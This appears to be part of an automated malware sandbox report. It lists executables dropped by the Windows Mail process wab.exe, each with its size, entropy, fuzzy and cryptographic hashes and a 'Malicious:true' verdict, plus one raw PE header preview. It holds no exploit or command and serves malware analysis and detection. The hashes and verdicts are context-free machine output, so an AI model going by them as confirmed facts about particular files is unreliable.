                                                                                                SHA1:C771539F3FA9F1AF9A9E9D6F257A9A3C5317772E
                                                                                                SHA-256:63DB8B997CB7CDCAC4360929C5998A232B9A429DDD74A88EEAEB8AAA29D24474
                                                                                                SHA-512:CDD9152B00EA205E0238FD7997FD96B2CF0718E7290630718B1128998F80E9F0E3C347DE1C476AAB67DC7E09BC8CA816CA39D321D85BB03DACF06269C9F5F169
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4395184
                                                                                                Entropy (8bit):5.9241413364591375
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:cXuo5RMru45b5dZlAj0sqW7YDKMzVwgBWMTwLe7G:OR345NRAgsr7QH6h93
                                                                                                MD5:6B5846BC42DB676458124E9B64BEF429
                                                                                                SHA1:764B0FC6F01544F8E39BBEE16E55B5A1ADFDB014
                                                                                                SHA-256:CEE14668777B06EAB589D4D29A9510B89A0A0D62DACFD2FED1CEC7ACFD66960E
                                                                                                SHA-512:34257DCA4FFE6CE8C402F9E065DF582B4E221E14D3AFE622909B0AE48C80CCB212378B7437B5FF78E013B995F712B0BE79902500343CFE46D7F6127AA584090F
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):603928
                                                                                                Entropy (8bit):6.447229278008163
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:hzKRgqBDxoiPCLXHLuk/Wg4Reh2mbeF+IGboJdx:hKgMxoiPoXruPi/++IvJdx
                                                                                                MD5:8EF30B3A7AEB63420B6DD95D081D9046
                                                                                                SHA1:871F1B5483B0487627DEADBC7316C8B9440042E8
                                                                                                SHA-256:B1C572271C709039685AE45086A1D3B57EE8F31D6A9030C6F47DAAF2551A6449
                                                                                                SHA-512:B5A9A27D83F5D4F5169DAA58D348C855ACDD37C8D05436F1B63725517E8C0ABB637181CC569DDDBF8EF1603F5143EF844577E1DC664405033F20E2156445E984
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):507024
                                                                                                Entropy (8bit):6.027052491483809
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:GyrmBq0RYSv3A5DhW15yChMFt2XTNJWLgCWzzYhPRt+:nrmBjYuALWJMn2XTmL7hPH+
                                                                                                MD5:6C2D19BFA4446F763A05A97156FBF558
                                                                                                SHA1:F08182FA8F68EACB2E906C7627811D490CBD7D14
                                                                                                SHA-256:5234568C60B2F49995703548666C8A2DCD7745019122D29DAC1020EA19CE161C
                                                                                                SHA-512:57AF1362D3422B04AF1CF245A4FD2A1089D024FC679659FBA5F892E1CDCF984F8E6F8652690FA5A9A799DA2B722474B61AE6C32C7CD7A330173EB6D3AD032675
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):251560
                                                                                                Entropy (8bit):6.413231422944333
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:momAAOwPcPIqk4Vsvt0uews+qZP9zOPBxGiryKI:msAETlVsKzZPixGBKI
                                                                                                MD5:4D9D18E2B09F2435D61B77935C0A7664
                                                                                                SHA1:3C0B98D91076BA322485390558E474CF933CD146
                                                                                                SHA-256:8677F97FE78DD2916AB1DFDBCB98FB08652D80F81C4C8FF5EE1C3F8EF3F93051
                                                                                                SHA-512:09393D9CF957E93D3D2B1D747C524C7208A7A404A17BA94B2E0B462632CE03CA2804770B2C670BACEA5C8CBF179CCDE11888670083B99964B4A998CB9B13250F
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):751720
                                                                                                Entropy (8bit):6.572900922542691
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:xdI8PdgELg6eaBlnjlZcTerWv+xdeFhvCs9TukINOW:xa8PWELTBlZ+erw+xdeFUsUkEh
                                                                                                MD5:6900C008B34CBCC5A50AA56C83EEB3DD
                                                                                                SHA1:9CD9B4CE42AAD96B998FAC22B0F125D70AD2E5FC
                                                                                                SHA-256:21119A1B53F614118699759D944278DFFD5DE92D285B7250E05E5BB42C444D7C
                                                                                                SHA-512:D41AAF60C3E1A7F7FF972457DF8C5031E7CF133B894AD467D100ED66D342CD893BBA87E9F0397E35F3A3D6690DF19E324B6B029DA20B13981D51485860CB6CDC
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):161968
                                                                                                Entropy (8bit):6.179397526086976
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkbNDS5lS5jITI1FeBT77NDS5lS3j+Wzy6oUSA7hZ:QNDS5lSlFeBTfNDS5lS7zUrsZ
                                                                                                MD5:2D46116FB35E1B827866BFD7581347AA
                                                                                                SHA1:CB5966248987F82189124B1782F84068F75B9B15
                                                                                                SHA-256:6406E08D3292F2A72548F766EC5ABEC2AD7DB3E4D8A42F7F33AC56ADFFA487C3
                                                                                                SHA-512:A87CE9F9E76E98655EA7310466E314FAF5CC98E3AF8B46E2E2908294A3995027960D4BD42356FD2F7019B71055512937565A1DE375DEB4111D052B2F30C42641
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):159560
                                                                                                Entropy (8bit):6.228746819324478
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk+klWPsom9TiWWWWWWWQM+FtWAzhIwaeENinkf8xw3xUFv2tGPrtPmF:Bb5zPaNQnBxw34Oita
                                                                                                MD5:1E2398318A0110A81DAAECBE4A1020C2
                                                                                                SHA1:DEB0A629A1BEFE2059CA8195A55BFB31EB18C557
                                                                                                SHA-256:32F7146C09BF7270AE036DD8AEC6C398B9611D1D00CA131BE697BA65A1BD4A3F
                                                                                                SHA-512:C9616CBE33AF9C57C5D918953592388376F7114DDF37F8C9AE4F834420F627CA4F1F89159DA02F5AF6D029CD60549490B99D45627A7F39E06CD250CA840F66EB
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2233240
                                                                                                Entropy (8bit):6.273525911634119
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:FDZgOA74U4o//sbtwvZTqFDk9sg71SmY90gh/G7QJoma+9duNGeVG29H:FqHVhTr5UmY90sGE5dIDG29H
                                                                                                MD5:1BCB6735406FB145CADA541083819C2B
                                                                                                SHA1:3CFD31C066860F804E658DBB76CF6CE14D342A24
                                                                                                SHA-256:4D7B34ED22D207B0BD737C7CAF2137DBC2F3C47BAE9E753DDD02EC5072FEC989
                                                                                                SHA-512:3F533C971AB5824DD75FA8D035503BD12F30D5099C0AA6F8CEB08429EE91B703CCDDC4A2A3442B850C057945A176F1A2B4F6D20FF259A682D285822A12CFB5DD
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):214432
                                                                                                Entropy (8bit):5.707538571611537
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkeVFptXofXXXXXXuh9gLzltw6Q1hqOJHrtTh:rtXofXXXXXXASLzb9uhqK
                                                                                                MD5:9FA79F3FD29775D061E8E14C460E4C66
                                                                                                SHA1:57859E5326791527692F5F825DC0ECD2670A1FBC
                                                                                                SHA-256:F9FFA9E69AAA1A753087479D138A0FF14CF3C74F32FECD1659C29CCEF77F5ACB
                                                                                                SHA-512:EBEEE5EC5199BB7F0B09D89D033C351797905C242CF9B73F26A69AFBD079D19B9EBA8AA6AE3319E3E0FC49FFBB8916D3D2EC3376A117A5E73F47EB27AF4D2744
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):620840
                                                                                                Entropy (8bit):6.51363323895205
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:soBdI/BUQtsfBCegl2eccL1q/xRyye7BfcwqEhDe:soM/BB0Bml2m1q/xRPCcwFC
                                                                                                MD5:ED4493E7B083EC9BE4A475763BFF5F33
                                                                                                SHA1:47A57367C50E528213DA802D54C6C4C8B310C8DC
                                                                                                SHA-256:13A1EAF65B046FEA9BC73895CC572D9DA0062DC55636931C5F9AC5379636A581
                                                                                                SHA-512:95DFC4770836D252B0FE9637E1F320D62DAF1C0965795F13E93D8C75BF704D70C754A199E687BFF655AD4A1CD1F998CAF2B9F552E4280E090927B030FBF19A1B
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1568248
                                                                                                Entropy (8bit):5.637684770188403
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:QwF+k53zCG2tIuQ6DtJQSZDhLOhkZzV5i9w/lmd+jrcUiACW:lFXG6uQ6D9L2uV50AlmsjYUiAB
                                                                                                MD5:121C03BBA1251851A260DBF96511E94B
                                                                                                SHA1:E11BABB614ED80A1C9CD053E2D25B6F7DF6E0B29
                                                                                                SHA-256:8C448212DF185668CAF1A984DC7BD9BF6A98FC30EFC35C509B4B6204B1CFA544
                                                                                                SHA-512:0BA4A192DC50C8CF02C1FE67448E907D5F0D68008F2471EEF4DA17D601C5799893E151AE2373594F25C891CCDA6EBD3B02313C5C3D7874D5EC6179FE64978FD0
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):634800
                                                                                                Entropy (8bit):6.637580106141556
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:1f/4sOdw+RfEB6tuAlnWhGZco6ijmn5jFTSt7yCPUkazi7JThVoSZeR6aQTJ:h/4Vdw+Ra6V6g2kazidN6SoEVF
                                                                                                MD5:D40F85B4848B912F785873A0F65929F8
                                                                                                SHA1:6DBC6F68210F0614C88123391277797A44EED64A
                                                                                                SHA-256:FA0CF60A3DE793BBFB2BF327A9CD8BF13D7B0A443EE063B160DAAEA98129C678
                                                                                                SHA-512:78D0223530930F5891AE52E7F752B0637B449EEFC0FADF9E3E27B9EABAF49834EFA805A897C512A7D8C09F466DA98A402D09C1F02C6827843E6AF961C60702E6
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):748192
                                                                                                Entropy (8bit):6.652535866207215
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:sKxLM1deLycUTc1kZi7zb1QRHhhj7WGvF5PYcdTFtZ3G97aSDGGHrbTwqFwydBf6:syY14evTc1kZi7zb1KHL8vbTlwOBC
                                                                                                MD5:6BA8B9E3FE4CDE976E7480E68BC2D0DF
                                                                                                SHA1:88A1B0CCECBB9F1D10303D6E727C7C8CAD46B157
                                                                                                SHA-256:B5D160CF12ECEDC0FADAB400C24A4B0096332CFD18ECACEE97A7D746EA36EA0F
                                                                                                SHA-512:0B7157C1FDA4F97CF56A2562FDF678EB946AE9FF76A6102487F6A32B146684A5E12D532802185AEEEC6AF99AFB026E6C7A71AB4BC3D85891923EAB91B246F915
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1917048
                                                                                                Entropy (8bit):3.7936073169931026
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:PBeXsm81c57ZXFzY5Ucyw4TapP25xxlq4cUcMeTOMzwMwZ:ZKs78A5UcyOPexxPcUcMeyvZ
                                                                                                MD5:1C15447004EDADF6833C19CB490ECE02
                                                                                                SHA1:EC2BDA5403AE8E0D06EA17CB56B70A6129E95FD5
                                                                                                SHA-256:29A87A9191EC08DDAAA96ADCAE7B131997BD487BECCF9182CB1CA517B8B9A1C6
                                                                                                SHA-512:2420427BA2F4FB7CC886AC96A38BA7909FD5403244EA9F0927A9CF83C22C2C46BEE2565ED8C9F5637D533A88916587D0B2677F4AB13B13A78526C6D26531D696
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4099520
                                                                                                Entropy (8bit):3.697376679380454
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:hyKs7cvZIFpCYVIUN2mGsb8HtkLaHLH04cLbUBRjLmP29DyZbT9oc/m06aCzE6hE:hyKsY+dy0ZScIBqBT11S0
                                                                                                MD5:89B7FD5BD551EB1C9F7347C6FB777C6F
                                                                                                SHA1:994B8F597860E88D2A0F56D2F4A1D46756F47307
                                                                                                SHA-256:267D501C9F2904DE5E11EB3D6D33AD081356D97F84388528E3B517691C1283A8
                                                                                                SHA-512:011AF68C1390FC0B4FC853FF96310ADF8936136C21D5E8909BF16A7E7FAF1CA324047CA03EACB16E6071A8AD9FA0943EC4937C51F895A3B6B162FAF7AE6C3D4F
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):452120
                                                                                                Entropy (8bit):5.929411837073156
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:EvhCpFviM0OKAOVf3m+2fCz29fx8/eAeTu:EEpFVKj3mFn9q
                                                                                                MD5:8895327CB903B0DC08F23035A992E2B2
                                                                                                SHA1:C03E385FB58E49047E5E8A338265793EC94731EC
                                                                                                SHA-256:F9D3CDD157B30B4A98770225BFCCDDA2E71511B3A90339BFD2C8EBE11F05E3CF
                                                                                                SHA-512:B8D4557F3B8B67D7F569953FDB2A36F2F396B516F40751F6E6B2C905F614F552A163028772514B93C39B0724AB7B734E4BBECF361EDA2FA6BF8DF62740A51CA2
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):116664
                                                                                                Entropy (8bit):6.10338252591718
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoSpuG+Ogz7jzJQHt9+zwIws8p95Zs0v+ISDr34+3RnQymkst:/rk5uGaz7jFQ68ICP5q0WISDr34W+wst
                                                                                                MD5:6A915BA50F7E345F1062F27B1CA597F8
                                                                                                SHA1:EA91C6AE9800EA18BB949492D41CD42769CD6D7A
                                                                                                SHA-256:C3075BEF0B2FACF27E33C4CDF19DD11BC1C5DC93CDCC710B3C6B6C3AD7FB42A8
                                                                                                SHA-512:7AD107B4FDC3776269717D28A789BD8D2ADA898DF1FE34DDC3B93FFDFA9CCC6E01F017914F2D3FCECB23789147C43FB420AD099E0D2FEDDE106F18333CDA1112
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):167392
                                                                                                Entropy (8bit):6.22614950708567
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkgWKZbTKeR3Tzp+8IxR8jYYrjHaVLIPSL1CgNX:fWK11Rp+8II5SLUgp
                                                                                                MD5:4B763805BE542D63E26C934813DD48E1
                                                                                                SHA1:FE1C7ACF48DC8EB78744DDC16CFA04A232A8D8E9
                                                                                                SHA-256:500DBAA3FBAF86BE75A82B70BEA0C6550112B14C93FE4F87EBA018D787780D49
                                                                                                SHA-512:FFB9A1D674800302C4B7156DE4C49FF2421774061FFBCBE2E058BD119EE310DCF65CA2B123133FE05C2430613463DED3DA76AC1DD91EA0E18CC28AC036703EA2
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):670928
                                                                                                Entropy (8bit):5.936386014437268
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:4wbRB+ZRhFfGNpzX5PtiPWRnTLtx5eq4/RnYRoS2Ds+2EYR1XLlShtg7ksyST2Rz:4wbT+ZR3fGrzX5PtiPWRnTLtx5eq4/R9
                                                                                                MD5:EC4DCAECC36C36010C2E887BCF43E330
                                                                                                SHA1:E03D5A16C55182C2A2C3FEC77FA2B61DED2E8452
                                                                                                SHA-256:106C086E34880154252DC126B873022482E00DC5393221D0EEB58B6DD3F61613
                                                                                                SHA-512:CE653BB3AB1802439105C08E7DEEDB2FBF1800D5BADE205F44DCBE9BF000B0F439C948C273A45DA18A18C87D85EB7E64331992877EB8EB9D981C1CAB2C3E40E0
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):115920
                                                                                                Entropy (8bit):5.6753678855989245
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoEw9K75Rp1Ukkz2zct/rzdaBotnMuvWM6TUaE:/rkDw9K1Fiz2ir+o5vWM6TUaE
                                                                                                MD5:EA8D8609056B190AC92C23DD650BD6EF
                                                                                                SHA1:6426393186982F636CE121704382ABDFF75BB4A7
                                                                                                SHA-256:D2D09630ED66662A22F768DBC36F5202CC502D8FC58E6A2A5D29F59700006020
                                                                                                SHA-512:453D530CFEEA78084339119658DC2397A6848D19902AAB31B7BADB46EED6DAAECEA2564664181C724F8F16A9D616CF7DE44C03532AC2A306B48F97B10D4918B9
                                                                                                Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):137776
Entropy (8bit):6.120121862589257
Encrypted:false
SSDEEP:1536:sEl9bbS3VoMLS+I1HtQdiHN4zbyezltnzGd1XuDxhkrTJwNZ5wmW1aHbfC:/rkCMi+zWeXdswvqiHm
MD5:829CB1493FD8C6F15376EEF64761531A
SHA1:282C572395117635B1C4C44732EEDE8CD65AF5F7
SHA-256:BFA3A7A9ABC6AFD35B2748CF257FD12A521722142ED9CA73B4E0B39A5190118B
SHA-512:243F353303DC74EF1183026EE65591BBFCB304F26A5CBE3E9E2EDEFA9946BF89C11BCA788EFC90B474D79371B5D38D13B6DBC466DB973BE5D9C570F168153D19
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1206680
Entropy (8bit):4.8259897811858545
Encrypted:false
SSDEEP:12288:+61ZFViRpx5tuwZl4asd/arEISgX0IkEMhTy:+61jViRTfVINdCr6gX0hEl
MD5:FB2BD6E7F39070E272740B92E84DB8AA
SHA1:1E7368F37A4E27701A124DE31E3604FF5F100EBB
SHA-256:1B338C2D04893C390870D5B7E554BF2926CDBB9BEA3058D459E09A07F416C843
SHA-512:88BA77D8180704EF8D7C9CA704A099D7945C13FF33099C26F59026E6A30E908F276B14081DDF01CFB86459F242DCA83E8B6C17D0172BC1DCA16F88B995D14939
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):400336
Entropy (8bit):6.545670669710066
Encrypted:false
SSDEEP:12288:G1rOCPapfd5bhooUBuFiExw/LXa20Dj6EzfJ:CrfIbbhooUBu3wzXa/Dj64
MD5:AB23B72F228F04A0DAFFF541E32A4EBA
SHA1:8770A0BAD7E668DEE5D226192DFA580B41F9878E
SHA-256:50FD4D6AE87587BE2E99F87FB937644EAD3D0F09BA41D18BFF24EFD8606F9DF4
SHA-512:658970F71F357BA0F241F14D77A3C59FFFB1A1961F75A9DD2C236412A0D451D109326DDE160A49FAE6776926B5912D01E8181709F6089C3567B906B5395D442D
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1662344
Entropy (8bit):4.231175782494914
Encrypted:false
SSDEEP:3072:/rkfK2OKsuWoZEsVK2OKsuWoZEckAQckAIDpAPfKrss1yyKrss1yAZDvYbNDzVY9:IztkAzkAZqrEdrEAZUCwFjNNYEzcL
MD5:92FA319DBFAB7C5461D7090E78829B86
SHA1:484EE02AD12B66F92F34DFD4B420F7A6632AC2A0
SHA-256:776CCAC7EC3B35D5C22D5B67F8A167CFF50554EC1D31D679EE315353CA8B092D
SHA-512:E2FE18E0F9CE8E648042B626E7D516149A300E121B9FC94911DBD88EF74855C57F9926807528BA1423F262F65AE4044EFB1A669FF9AD21B818CACED6069BF847
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3531712
Entropy (8bit):3.7572585003160985
Encrypted:false
SSDEEP:3072:/rks2OKsuWoZE/B/SRD17QYFCYKsQojSXQojSfE1c9AvWiYwOsAE1c9881jLvsDF:GgSRJQYKV++VYwjatvsDVpDsehRAKzYM
MD5:BFB3BE900341A821EBD55FA532ECE5EE
SHA1:766D0BA424A86EBD4ADFA3E35BBC161BC0BF286C
SHA-256:B89EABA2791BD53C106CB478B3AFD3A06D1AA34C12C067324C5954B1560F9AA9
SHA-512:2A053A3F810B6DAC703B42A0628168B774DB051B390335725429AB566294E389BACBDA0BF5BF7378EB59A2EF769E73BB45736464E1BB3CBF5CC15CDBFC53B459
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):83880
Entropy (8bit):5.823944915840722
Encrypted:false
SSDEEP:1536:sEl9bbS3VoNKfEBr3fHT4nAzHGkYJ+ziw6+zb:/rkePh3IAzHGEJn
MD5:FC67F440A689C3EE90251D6C2C4E2C9D
SHA1:7F20C0098B95C41AC33A96F4ABF0581AE3E5D995
SHA-256:F428B30BEB050212F0A9E6FA72E4D7FCF86CD52B3FB9FD43E5A0FC54C3B489BB
SHA-512:982943EE35AA49ADAB5E45E7FD7AD209FF4BE057C71B2B732DDDCFC78B3673C0EC8CEA83B7DA2C82BAE73BE0E1B4A0C66C497F519C5F46AB31BB6CB7D247DE06
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4319112
Entropy (8bit):3.7943883996506433
Encrypted:false
SSDEEP:6144:uUh82lTMY/C3uuQyMyquNlBXYJ7M444IB:ukyIgG47B
MD5:FEB87B50F28805BBBFD4E61540E74928
SHA1:8AD8B96031374469E1C8A6603B20B2D54D6952C3
SHA-256:54B62651B987E81F90B6B8BB1F74CDACE2B0FA0D507B97DD45D789F8377A38F9
SHA-512:ABA09F5254CB6BF70093997C4347DC545254C7C289723C62287F2D31D9F0B41206380DAF93E5F8DA0F2D5A3BC1BF0F18C5F6746E83948C36F4A6954789E4784A
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):785448
Entropy (8bit):3.8385138127727325
Encrypted:false
SSDEEP:6144:oWSXeSC+hBMdNRneNMToeGYeneqjpGtBlmF:oLevUEcLe9l2
MD5:1402F0423B2FB1FF2782284DD0D90BD8
SHA1:7CA6379EE4FA2348E7373632E689715AA8451C8E
SHA-256:E4268E89FF0D78048C987424945B1C65773926EBD9122923E1B84D2D7ED0476D
SHA-512:22B2A31E677A410EEF0CB40587EC881E2D29EB06B64123116A6E58572C1FD9B53DFB73B788A42C3DC0E615C88BE3BD949CC2E04F3422A4130B4954AE129F4B11
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1081280
Entropy (8bit):3.6924247178826266
Encrypted:false
SSDEEP:3072:/rkOyTUawK12P04ti0o5gmQNJDJnJG20FxPlJPJSS12Zzwww6G:9s4wqmQN59wtSS2zwmG
MD5:C375297B394AD1111289612F87FFEA9F
SHA1:F5FC1F348DD8344D9BCEA024964BB0B5FF018B01
SHA-256:ABF9CE89E824EC6E39F30000F3F8928FCDD6E506897505B9E19CEC4EBF7E5E1A
SHA-512:E0F105D82F4E0BC6F503877F56D48CC742A702C5A80665B9C97F674A5F1EBB18567E78DB5B180E9FC1A252C0682D33980F553C8700DDB31A7A45ECD727CA48B6
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1722808
Entropy (8bit):6.458274782007939
Encrypted:false
SSDEEP:49152:vuoh1EWXRkd+h9y6NsRZ9MtL4kD5G5LVuhqITJemL9SQM3:vuohO2km9PNsRZ9MtL4ktG5LV93
MD5:C94CAD958EFE5BB77D4D31CF9D62D863
SHA1:D1BD3FCDD57BDE432F49D020985257B26014C84D
SHA-256:B9A4C86E6AFD87E343FF29FA306FE257A426AF7C4F3B30F0172735D9FCCCDA2D
SHA-512:4547EB7B45411F4AFD00E2C35DA91BFA142B5B11151466C888A0ED6BC20A326DFBF8D4B1BBBFA8FA56DFDFDE40DABAB7FE26F88A838B9BEBF22A0097F54E7106
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):307784
Entropy (8bit):6.374475137741311
Encrypted:false
SSDEEP:6144:9+OpwoajoJ/cLr6eNI0A2kg79zge/ceeE1+v:9DWhS5g72veeU+v
MD5:6BF22D15646E7998D748CD42C23AB626
SHA1:89D49CF33D773AD86B4E1CC7D9E7021216B937B0
SHA-256:AF364BB28D01FC59D7A9A9CD9A2CACC66D0E0020C64D93E8C5A0BBC95DFE8C6E
SHA-512:3BF8681007FE707F8E87B28F0D0F6263C6247FE251C2B9339322063B029BACA0BDB9FFD5058B02C04132765F08A39933D8663CA7444441294E0C5888D3D8F2F4
Malicious:true
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):97920
Entropy (8bit):5.808712601175728
Encrypted:false
SSDEEP:1536:sEl9bbS3Vo3zKAtCz72I/Q/RPTO5piDDFwzS:/rkguFvgy5piDD6zS
MD5:2196FCEBBDCC593CF5A85F3207970CA4
SHA1:9C6B9085378B56500161BDA6339E791A7829F56F
SHA-256:B40B4E0A728C5BE2D266FD6BE1E719E65C5DC10D46F15B2DEB346D3ED1B2421D
SHA-512:56D7A1B02F56F3BEE9E0038857EF025B0896004A3A077089EE15DC21E3D80C2DD27D46AE11BB7BA877B540C8408EAFEFE57D9B4BE7B05164F33ECA61ACD2F650
Malicious:true
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1994448
                                                                                                Entropy (8bit):6.525646487599016
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Jl8U9+tiqfG7C+5I6ZOX0Bh4MdDHc/EBRXXZUABfmcQ:Jl8+++7hOXODHc/EdQ
                                                                                                MD5:410F8406572FEEF24894B4A4E98FFA77
                                                                                                SHA1:A84E51801825B47741FF4ADBA49FBADFC0A44E4B
                                                                                                SHA-256:21C6F535FC1ECE2A2CF21F0C54BA190A6A065E4F241AA1DB2068E42AD424FBCA
                                                                                                SHA-512:C6543AC541D669DD8B6286DACAD02F25854276EE41DA02F00471CDF6ACCB87CAD04CF517D2712A1E5F88E1BCCE29DCB21183D6C047E94CACB9C2ABAD27D8C22A
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):275872
                                                                                                Entropy (8bit):3.942096448686192
                                                                                                Encrypted:false
